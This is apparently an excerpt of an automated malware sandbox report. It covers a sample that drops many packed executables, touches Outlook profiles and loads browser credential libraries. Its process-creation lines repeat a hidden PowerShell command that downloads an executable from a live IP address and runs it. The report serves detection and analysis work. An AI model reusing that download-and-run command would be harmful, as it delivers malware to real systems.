Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll, qmgr.dll, bitsperf.dll, powrprof.dll, xmllite.dll, firewallapi.dll, esent.dll, umpdc.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, wldp.dll, ntmarta.dll, profapi.dll, flightsettings.dll, policymanager.dll, msvcp110_win.dll, netprofm.dll, npmproxy.dll, bitsigd.dll, upnp.dll, winhttp.dll, ssdpapi.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, appxdeploymentclient.dll, cryptbase.dll, wsmauto.dll, miutils.dll, wsmsvc.dll, dsrole.dll, pcwum.dll, mi.dll, userenv.dll, gpapi.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, ondemandconnroutehelper.dll, msv1_0.dll, ntlmshared.dll, cryptdll.dll, webio.dll, mswsock.dll, winnsi.dll, fwpuclnt.dll, rasadhlp.dll, rmclient.dll, usermgrcli.dll, execmodelclient.dll, propsys.dll, coremessaging.dll, twinapi.appcore.dll, onecorecommonproxystub.dll, execmodelproxy.dll, resourcepolicyclient.dll, vssapi.dll, vsstrace.dll, samcli.dll, samlib.dll, es.dll, bitsproxy.dll
Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: Google Drive.lnk.26.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.26.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.26.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.26.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.26.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.26.dr | LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: aV2ffcSuKl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: aV2ffcSuKl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: aV2ffcSuKl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: aV2ffcSuKl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: aV2ffcSuKl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: aV2ffcSuKl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: aV2ffcSuKl.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: ILqcVeT.exe, 00000017.00000002.2551363792.000000006B99D000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: nss3.pdb@ source: ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.1466076584.000001DDD56E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdb source: 7dbaa342f5.exe, 0000003E.00000002.2594796685.000000000DB74000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: *e.pdb source: powershell.exe, 00000009.00000002.1468143447.000001DDD58B0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tomation.pdb1 source: powershell.exe, 00000009.00000002.1466076584.000001DDD56E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: mozglue.pdb source: ILqcVeT.exe, 00000017.00000002.2551363792.000000006B99D000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: 7dbaa342f5.exe, 0000003E.00000002.2594796685.000000000DB74000.00000004.00001000.00020000.00000000.sdmp
Source: aV2ffcSuKl.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: aV2ffcSuKl.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: aV2ffcSuKl.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: aV2ffcSuKl.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: aV2ffcSuKl.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                                Data Obfuscation

Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Unpacked PE file: 11.2.TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.620000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Unpacked PE file: 12.2.rapes.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Unpacked PE file: 13.2.rapes.exe.2b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE | Unpacked PE file: 14.2.TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.620000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Unpacked PE file: 23.2.ILqcVeT.exe.f80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;hbloxsmk:EW;bicjwbqp:EW; vs :ER;.rsrc :W;ZZu~:W; :EW;hbloxsmk:EW;bicjwbqp:EW;
Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe | Unpacked PE file: 24.2.vertualiziren.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yuxfscdw:EW;oiahzgmh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yuxfscdw:EW;oiahzgmh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE | Unpacked PE file: 45.2.TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE | Unpacked PE file: 49.2.TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vbshiqxp:EW;ijdsmmzx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe | Unpacked PE file: 62.2.7dbaa342f5.exe.3a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;yououbtf:EW;qtaxnsnn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;yououbtf:EW;qtaxnsnn:EW;.taggant:EW;
Source: random[1].exe0.16.dr, gBMthepoZSL1ZVKpeA.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: acd63ce6fe.exe.16.dr, gBMthepoZSL1ZVKpeA.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: random[1].exe0.16.drStatic PE information: 0xB00FDD35 [Wed Aug 8 20:14:45 2063 UTC]
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C142DE
                                                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                                                Source: nhDLtPT.exe.16.drStatic PE information: real checksum: 0x0 should be: 0x73d64
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: real checksum: 0x1c50e2 should be: 0x1ca818
                                                Source: vertualiziren.exe.22.drStatic PE information: real checksum: 0x1ac12a should be: 0x1aef47
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: real checksum: 0x48f17d should be: 0x49965e
                                                Source: c105f06ef0.exe.16.drStatic PE information: real checksum: 0x317062 should be: 0x315548
                                                Source: random[1].exe1.16.drStatic PE information: real checksum: 0x317062 should be: 0x315548
                                                Source: random[3].exe.16.drStatic PE information: real checksum: 0x1c50e2 should be: 0x1ca818
                                                Source: random[2].exe1.16.drStatic PE information: real checksum: 0x1b00fa should be: 0x1b7162
                                                Source: random[2].exe.16.drStatic PE information: real checksum: 0x48f17d should be: 0x49965e
                                                Source: vertualiziren[1].exe.22.drStatic PE information: real checksum: 0x1ac12a should be: 0x1aef47
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: real checksum: 0x1e1343 should be: 0x1e4763
                                                Source: df2fea7261.exe.16.drStatic PE information: real checksum: 0x1b00fa should be: 0x1b7162
                                                Source: random[1].exe.16.drStatic PE information: real checksum: 0x3c3c45 should be: 0x3c87d7
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: real checksum: 0x3c3c45 should be: 0x3c87d7
                                                Source: acd63ce6fe.exe.16.drStatic PE information: real checksum: 0x0 should be: 0x794ab
                                                Source: benskvi.exe.24.drStatic PE information: real checksum: 0x1ac12a should be: 0x1aef47
                                                Source: rapes.exe.11.drStatic PE information: real checksum: 0x1e1343 should be: 0x1e4763
                                                Source: f0b421a199.exe.16.drStatic PE information: real checksum: 0x1dd1f8 should be: 0x1da39d
                                                Source: random[1].exe0.16.drStatic PE information: real checksum: 0x0 should be: 0x794ab
                                                Source: random[2].exe0.16.drStatic PE information: real checksum: 0x1dd1f8 should be: 0x1da39d
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: real checksum: 0x1e1343 should be: 0x1e4763
                                                Source: Gxtuum.exe.20.drStatic PE information: real checksum: 0x0 should be: 0x73d64
                                                Source: nhDLtPT[1].exe.16.drStatic PE information: real checksum: 0x0 should be: 0x73d64
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: real checksum: 0x1e1343 should be: 0x1e4763
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: real checksum: 0x1e1343 should be: 0x1e4763
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name:
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name: .idata
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name:
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name: vbshiqxp
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name: ijdsmmzx
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE.6.drStatic PE information: section name: .taggant
                                                Source: rapes.exe.11.drStatic PE information: section name:
                                                Source: rapes.exe.11.drStatic PE information: section name: .idata
                                                Source: rapes.exe.11.drStatic PE information: section name:
                                                Source: rapes.exe.11.drStatic PE information: section name: vbshiqxp
                                                Source: rapes.exe.11.drStatic PE information: section name: ijdsmmzx
                                                Source: rapes.exe.11.drStatic PE information: section name: .taggant
                                                Source: random[1].exe.16.drStatic PE information: section name:
                                                Source: random[1].exe.16.drStatic PE information: section name: .idata
                                                Source: random[1].exe.16.drStatic PE information: section name:
                                                Source: random[1].exe.16.drStatic PE information: section name: yououbtf
                                                Source: random[1].exe.16.drStatic PE information: section name: qtaxnsnn
                                                Source: random[1].exe.16.drStatic PE information: section name: .taggant
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: section name:
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: section name: .idata
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: section name:
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: section name: yououbtf
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: section name: qtaxnsnn
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: section name: .taggant
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name:
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name: .rsrc
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name: .idata
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name:
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name: hbloxsmk
                                                Source: ILqcVeT[1].exe.16.drStatic PE information: section name: bicjwbqp
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name:
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name: .rsrc
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name: .idata
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name:
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name: hbloxsmk
                                                Source: ILqcVeT.exe.16.drStatic PE information: section name: bicjwbqp
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name:
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name: .rsrc
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name: .idata
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name:
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name: hbloxsmk
                                                Source: rXOl0pp[1].exe.16.drStatic PE information: section name: bicjwbqp
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name:
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name: .rsrc
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name: .idata
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name:
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name: hbloxsmk
                                                Source: rXOl0pp.exe.16.drStatic PE information: section name: bicjwbqp
                                                Source: random[1].exe0.16.drStatic PE information: section name: .CSS
                                                Source: acd63ce6fe.exe.16.drStatic PE information: section name: .CSS
                                                Source: random[2].exe.16.drStatic PE information: section name:
                                                Source: random[2].exe.16.drStatic PE information: section name: .idata
                                                Source: random[2].exe.16.drStatic PE information: section name:
                                                Source: random[2].exe.16.drStatic PE information: section name: pqifeagr
                                                Source: random[2].exe.16.drStatic PE information: section name: oolacami
                                                Source: random[2].exe.16.drStatic PE information: section name: .taggant
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: section name:
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: section name: .idata
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: section name:
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: section name: pqifeagr
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: section name: oolacami
                                                Source: 5a57aa51d3.exe.16.drStatic PE information: section name: .taggant
                                                Source: random[2].exe0.16.drStatic PE information: section name:
                                                Source: random[2].exe0.16.drStatic PE information: section name: .idata
                                                Source: random[2].exe0.16.drStatic PE information: section name:
                                                Source: random[2].exe0.16.drStatic PE information: section name: qqigmylm
                                                Source: random[2].exe0.16.drStatic PE information: section name: tdbiameb
                                                Source: random[2].exe0.16.drStatic PE information: section name: .taggant
                                                Source: f0b421a199.exe.16.drStatic PE information: section name:
                                                Source: f0b421a199.exe.16.drStatic PE information: section name: .idata
                                                Source: f0b421a199.exe.16.drStatic PE information: section name:
                                                Source: f0b421a199.exe.16.drStatic PE information: section name: qqigmylm
                                                Source: f0b421a199.exe.16.drStatic PE information: section name: tdbiameb
                                                Source: f0b421a199.exe.16.drStatic PE information: section name: .taggant
                                                Source: random[1].exe1.16.drStatic PE information: section name:
                                                Source: random[1].exe1.16.drStatic PE information: section name: .idata
                                                Source: random[1].exe1.16.drStatic PE information: section name: dwnnnbgo
                                                Source: random[1].exe1.16.drStatic PE information: section name: lhzjyktk
                                                Source: random[1].exe1.16.drStatic PE information: section name: .taggant
                                                Source: c105f06ef0.exe.16.drStatic PE information: section name:
                                                Source: c105f06ef0.exe.16.drStatic PE information: section name: .idata
                                                Source: c105f06ef0.exe.16.drStatic PE information: section name: dwnnnbgo
                                                Source: c105f06ef0.exe.16.drStatic PE information: section name: lhzjyktk
                                                Source: c105f06ef0.exe.16.drStatic PE information: section name: .taggant
                                                Source: random[3].exe.16.drStatic PE information: section name:
                                                Source: random[3].exe.16.drStatic PE information: section name: .idata
                                                Source: random[3].exe.16.drStatic PE information: section name:
                                                Source: random[3].exe.16.drStatic PE information: section name: hjgvekwy
                                                Source: random[3].exe.16.drStatic PE information: section name: pramlbdq
                                                Source: random[3].exe.16.drStatic PE information: section name: .taggant
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: section name:
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: section name: .idata
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: section name:
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: section name: hjgvekwy
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: section name: pramlbdq
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: section name: .taggant
                                                Source: random[2].exe1.16.drStatic PE information: section name:
                                                Source: random[2].exe1.16.drStatic PE information: section name: .idata
                                                Source: random[2].exe1.16.drStatic PE information: section name:
                                                Source: random[2].exe1.16.drStatic PE information: section name: kxuwrjnk
                                                Source: random[2].exe1.16.drStatic PE information: section name: ykrabclo
                                                Source: random[2].exe1.16.drStatic PE information: section name: .taggant
                                                Source: df2fea7261.exe.16.drStatic PE information: section name:
                                                Source: df2fea7261.exe.16.drStatic PE information: section name: .idata
                                                Source: df2fea7261.exe.16.drStatic PE information: section name:
                                                Source: df2fea7261.exe.16.drStatic PE information: section name: kxuwrjnk
                                                Source: df2fea7261.exe.16.drStatic PE information: section name: ykrabclo
                                                Source: df2fea7261.exe.16.drStatic PE information: section name: .taggant
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name:
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name: .idata
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name:
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name: yuxfscdw
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name: oiahzgmh
                                                Source: vertualiziren[1].exe.22.drStatic PE information: section name: .taggant
                                                Source: vertualiziren.exe.22.drStatic PE information: section name:
                                                Source: vertualiziren.exe.22.drStatic PE information: section name: .idata
                                                Source: vertualiziren.exe.22.drStatic PE information: section name:
                                                Source: vertualiziren.exe.22.drStatic PE information: section name: yuxfscdw
                                                Source: vertualiziren.exe.22.drStatic PE information: section name: oiahzgmh
                                                Source: vertualiziren.exe.22.drStatic PE information: section name: .taggant
                                                Source: freebl3.dll.23.drStatic PE information: section name: .00cfg
                                                Source: freebl3[1].dll.23.drStatic PE information: section name: .00cfg
                                                Source: mozglue.dll.23.drStatic PE information: section name: .00cfg
                                                Source: mozglue[1].dll.23.drStatic PE information: section name: .00cfg
                                                Source: msvcp140.dll.23.drStatic PE information: section name: .didat
                                                Source: msvcp140[1].dll.23.drStatic PE information: section name: .didat
                                                Source: nss3.dll.23.drStatic PE information: section name: .00cfg
                                                Source: nss3[1].dll.23.drStatic PE information: section name: .00cfg
                                                Source: softokn3.dll.23.drStatic PE information: section name: .00cfg
                                                Source: softokn3[1].dll.23.drStatic PE information: section name: .00cfg
                                                Source: benskvi.exe.24.drStatic PE information: section name:
                                                Source: benskvi.exe.24.drStatic PE information: section name: .idata
                                                Source: benskvi.exe.24.drStatic PE information: section name:
                                                Source: benskvi.exe.24.drStatic PE information: section name: yuxfscdw
                                                Source: benskvi.exe.24.drStatic PE information: section name: oiahzgmh
                                                Source: benskvi.exe.24.drStatic PE information: section name: .taggant
                                                Source: freebl3[1].dll.25.drStatic PE information: section name: .00cfg
                                                Source: mozglue[1].dll.25.drStatic PE information: section name: .00cfg
                                                Source: msvcp140[1].dll.25.drStatic PE information: section name: .didat
                                                Source: nss3[1].dll.25.drStatic PE information: section name: .00cfg
                                                Source: softokn3[1].dll.25.drStatic PE information: section name: .00cfg
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name:
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name: .idata
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name:
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name: vbshiqxp
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name: ijdsmmzx
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: section name: .taggant
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name:
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name: .idata
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name:
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name: vbshiqxp
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name: ijdsmmzx
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: section name: .taggant
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name:
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name: .idata
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name:
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name: vbshiqxp
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name: ijdsmmzx
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: section name: .taggant
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C322CB push ds; ret 0_2_00C322E2
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C30A76 push ecx; ret 0_2_00C30A89
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFE7B6100BD pushad ; iretd 9_2_00007FFE7B6100C1
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BDA063 push ecx; ret 20_2_00BDA076
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeCode function: 20_2_00BC72EF pushad ; iretd 20_2_00BC72F0
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CDA063 push ecx; ret 21_2_00CDA076
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeCode function: 21_2_00CC72EF pushad ; iretd 21_2_00CC72F0
